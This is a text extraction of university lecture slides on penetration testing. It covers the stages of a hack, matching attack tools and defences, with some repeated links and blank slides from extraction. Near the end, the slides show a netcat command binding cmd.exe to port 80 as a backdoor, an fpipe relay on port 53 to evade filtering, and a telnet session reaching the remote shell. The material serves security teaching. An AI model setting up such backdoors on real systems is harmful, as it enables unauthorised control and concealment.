Download - Penetrate Test
-
8/14/2019 Penetrate Test
1/26
1cs591 chow
C. Edward Chow
Penetrate Testing
-
8/14/2019 Penetrate Test
2/26
2cs591 chow
Outline of The Talk
Definition, Concepts on Penetration Testing/Hacking Anatomy of a Hack Framework for penetration studies Skills and Requirements of a Penetration Tester SAN list of Security Holes Internet Penetration Dial up Penetration Internal Penetration References:
CORE IMPACT - Penetration Testing: Assessing Your Overall
Security Before Attackers Do Pages 165,277 Security in Computing. Hack I.T, Security Through Penetration Testing, by T.J.
Klevinksy, Scott Laliberte, Ajay Gupta.
http://www.hackingexposed.com/win2k/links.html
http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007 -
8/14/2019 Penetrate Test
3/26
3cs591 chow
Definition
Vulnerability (Security Flaw):specific failure of the system to guard againstunauthorized access or actions. It can be procedures, technology (SW orHW), or management.
Using the failure of the system to violate the site security policy is calledexploiting the vulnerability
Penetration Studyis a test for evaluating the strengths of all security
controls on the computer system. It intends to find all possible securityholes and provides suggestions for fixing them. Penetration Testingis an authorized attempt to violate specific constraints
stated in the form of a security or integrity policy. Penetration Testingis a testing technique for discovering, understanding,
and documenting all the security holes that can be found in a system. It is not a proof techniques. It can never prove the absence of security
flaws. It can only prove their presence. Example goals of penetration studies are gaining of read or write access to
specific objects, files, or accounts; gaining of specific privileges; anddisruption or denial of the availability of objects.
What is the difference between penetration testing and hacking/intrusion?
-
8/14/2019 Penetrate Test
4/26
4cs591 chow
More Thorough Penetration Study
A more thorough penetration study is to find the properinterpretation of vulnerabilities found, draw conclusionon the care taken in the design and implementation.
A simple list of vulnerabilities , although helpful inclosing those specific holes, contribute far less to thesecurity of a system.
In practice, constrains (resource, money, time) affect thepenetration study
-
8/14/2019 Penetrate Test
5/26
5cs591 chow
Hacking
Methodology
(Steps)
An excellentdescriptioninside of theback cover
page ofHacking
Exposed
text by
McClure etal.
Scanning
Footprinting
Enumeration
Gaining Access
Escalating Privilege
Pilferting
Covering TracksCreating Back Doors
Denial of Service
whois nslookup
Nmap fping
dumpACL showmountlegion rpcinfo
Tcpdump LophtcrackNAT
Johntheripper getadminRhosts userdata
Config files registryzap rootkits
Cron at startup foldernetcat keystroke logger
remote desktopSynk4 ping of death
tfn/stacheldraht
-
8/14/2019 Penetrate Test
6/26
6cs591 chow
Footprinting
Information gathering. Sam Spade is window-based network query tool. Find out target IP address/phone number range
Why check phone numbers? Namespace acquisition. Network Topology (visualRoute). It is essential to a surgical attack. The key here is not to miss any details.
Note that for penetration tester, this step is to avoiding testing othersinstead of your client and to include all systems to be tested (sometime theorganization will not tell you what their systems consist of).
Defense: deploy NIDS (snort), RotoRouter
Techniques Open Sourcesearch
Find domain name,admin, IP addresses
name servers
DNS zonetransfer
Tools Google, searchengine, Edgar
Whois
(Network solution;arin)
Nslookup (lsd)digSam Spade
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ge.+com%22http://www.sec.gov/cgi-bin/srch-edgarhttp://www.networksolutions.com/cgi-bin/whois/whois?STRING=ibm.com&SearchType=dohttp://ws.arin.net/cgi-bin/whois.pl?queryinput=128.198.0.0http://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://www.samspade.org/ssw/http://www.samspade.org/ssw/http://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://ws.arin.net/cgi-bin/whois.pl?queryinput=128.198.0.0http://www.networksolutions.com/cgi-bin/whois/whois?STRING=ibm.com&SearchType=dohttp://www.sec.gov/cgi-bin/srch-edgarhttp://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ge.+com%22 -
8/14/2019 Penetrate Test
7/26
7cs591 chow
Scanning
Bulk Target assessment Which machine is up and what ports (services) are open
Focus on most promising avenues of entry.
To avoid being detect, these tools can reduce frequency of packetsending and randomize the ports or IP addresses to be scanned inthe sequence.
Note that some machine does not respond to ping but responds torequests to ports that actually open. Ardor is an example.
Techniques Ping sweep TCP/UDP port
scan
OS detection
Tools Fping, icmpenumWS_Ping ProPack
nmap
NmapSuperscan
fscan
Nmapqueso
siphon
http://www.fping.com/download/http://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://cs.uccs.edu/~cs691/penetrateTest/toolresults.htmlhttp://www.fping.com/download/ -
8/14/2019 Penetrate Test
8/26
8cs591 chow
Enumeration
Identify valid user accounts or poorly protected resource shares.
Most intrusive probing than scanning step.
Techniques list useraccounts
list file shares identifyapplications
Tools Null sessions
DumpACL
Sid2usre
onSiteAdmin
Showmount
NAT
legion
Banner grabingwith telnet ornetcat, rpcinfo
http://rng.r2.ru/download.htmhttp://www.atstake.com/research/tools/network_utilities/http://www.atstake.com/research/tools/network_utilities/http://rng.r2.ru/download.htm -
8/14/2019 Penetrate Test
9/26
9cs591 chow
Gaining Access
Based on the information gathered so far, make an informedattempted to access the target.
Techniques
Passwordeavesdropping
File sharebrute forcing
Password
File grab
Bufferoverflow
Tools Tcpdump/ssldumpL0phtcrackreadsmb
NATlegion
TftpPwddump2(NT)
Ttdb, bindIIS.HTR/ISM.DLL
-
8/14/2019 Penetrate Test
10/26
10cs591 chow
Escalating Privilege
If only user-level access was obtained in the last step, seek togain complete control of the system.
Techniques Password cracking Known Exploits
Tools John the ripperL0phtcrack
Lc_messages,
Getadmin,sechole
-
8/14/2019 Penetrate Test
11/26
-
8/14/2019 Penetrate Test
12/26
12cs591 chow
Covering Tracks
Once total ownership of the target is secured, hiding this fact fromsystem administrators become paramount, less they quickly endthe romp.
Techniques Clear Logs Hide tools
Tools Zap, Event Log GUI Rootkitsfile streaming
-
8/14/2019 Penetrate Test
13/26
13cs591 chow
Creating Back Doors
Trap doors will be laid in various parts of the system to ensure thatprivilege access is easily regained whenever the intruder decides.
Techniques Create rogueuser accounts
Schedule batchjobs
Infect startup files
Tools Members ofwheel, admin
Cron, AT rc, startup folder,registry keys
Techniques Plant remotecontrol services
Install monitoringmechanisms
Replace appls withTrojans
Tools Netcat,remote.exe
VNC, B02Kremote desktop
Keystroke loggers,add acct. tosecadmin mailaliases
Login, fpnwcint.dll
-
8/14/2019 Penetrate Test
14/26
14cs591 chow
Denial of Services
If atacker is unsuccessful in gaining access, they may use readilyavailable exploit code to disable a target as a last resort.
Techniques Syn flood ICMP techniques Identical src/dstSYN requests
Tools synk4 Ping to deathsmurf
LandLatierra
Techniques Overlappingfragment/offsetbugs
Out of bounds TCPoptions (OOB)
DDoS
Tools Netcat,remote.exe
VNC, B02Kremote desktop
Keystroke loggers,add acct. tosecadmin mailaliases
Trinoo
TFNstacheldraht
http://staff.washington.edu/dittrich/misc/trinoo.analysishttp://www.networkcomputing.com/1201/1201f1c1.htmlhttp://www.anml.iu.edu/ddos/tools.htmlhttp://www.anml.iu.edu/ddos/tools.htmlhttp://www.networkcomputing.com/1201/1201f1c1.htmlhttp://staff.washington.edu/dittrich/misc/trinoo.analysis -
8/14/2019 Penetrate Test
15/26
15cs591 chow
Nessus: Integrated Security Scanning
Tool
Originally designed by Renaud Deraison
Available at www.nessus.org
Main scanning engine running on Unix server with client
GUI running on Unix or Windows. Pretty good control and reporting.
Include a script language for plug-in (detectingadditional attacks).
http://www.nessus.org/pres/bh2001/index.html
mailto:[email protected]://www.nessus.org/http://www.nessus.org/mailto:[email protected] -
8/14/2019 Penetrate Test
16/26
16cs591 chow
-
8/14/2019 Penetrate Test
17/26
17cs591 chow
-
8/14/2019 Penetrate Test
18/26
18cs591 chow
-
8/14/2019 Penetrate Test
19/26
19cs591 chow
-
8/14/2019 Penetrate Test
20/26
20cs591 chow
-
8/14/2019 Penetrate Test
21/26
21cs591 chow
-
8/14/2019 Penetrate Test
22/26
22cs591 chow
Setting up Backdoor Connection
Once obtain the admin privilege, you install tools thatallow you to run command remotely (e.g. netcat) or usethe machine as a stepping stone for relaying orredirecting the msg (fpipe)
Port redirection accepts packet from one port and sendit over another port. It can be used to avoid packet filterfirewall.
We will use netcat and fpipe to illustrate the concept.
Netcat is available athttp://www.atstake.com/research/tools/network_utilities/
Fpipe is available at http://www.foundstone.com
http://www.foundstone.com/http://www.foundstone.com/ -
8/14/2019 Penetrate Test
23/26
23cs591 chow
Setup Netcat
C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -ecmd.exe -p 80 -s 128.198.177.63
Hacker runs the nc command on the victim machine, which listensto the command sent in from port 80, use cmd.exe to run thecommand and redirect the console output as http response back.
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu listening on[128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
Here we bind in front of port 80. You can also use port 139. Theidea is used known port to avoid detection.
-L is used to repeat previous command after connection isterminated.
The nc command will receive command from packet to port 80, and
run it with cmd.exe and send back execution result.
-
8/14/2019 Penetrate Test
24/26
24cs591 chow
Setup FPIPE
C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63FPipe v2.1 - TCP/UDP port redirector.
This is run the infected machine which serves as relay. Use port 53 forlisten to Internet connection, relay any msg from port 53 to machinewith 128.198.177.63 and port 80.
Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com
Pipe connected: In: 128.198.162.60:58797 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80 Pipe connected: In: 128.198.162.60:58801 --> 128.198.168.63:53 Out: 128.198.168.63:53 --> 128.198.177.63:80
Here the fpipe program listens to packet incoming from blanca to port
53, relay it over to 128.198.177.63 using port 53 (DNS) to avoiddetection.
-
8/14/2019 Penetrate Test
25/26
25cs591 chow
Telnet to the relay host
C:\work\software\security\nc>[cs691@blanca cs691]$ telnet 128.198.168.63 53 Trying 128.198.168.63... Connected to vivian (128.198.168.63). Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\work\cucs\cs522\project>dir dir Volume in drive C is S3A1203D501 Volume Serial Number is 503B-9F00
Directory of C:\work\cucs\cs522\project
04/29/2003 12:56 PM . 04/29/2003 12:56 PM .. 04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps
Note that it is the console output of 128.198.177.63 machine being shown here.
-
8/14/2019 Penetrate Test
26/26
26cs591 chow
Layering of Tests
1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.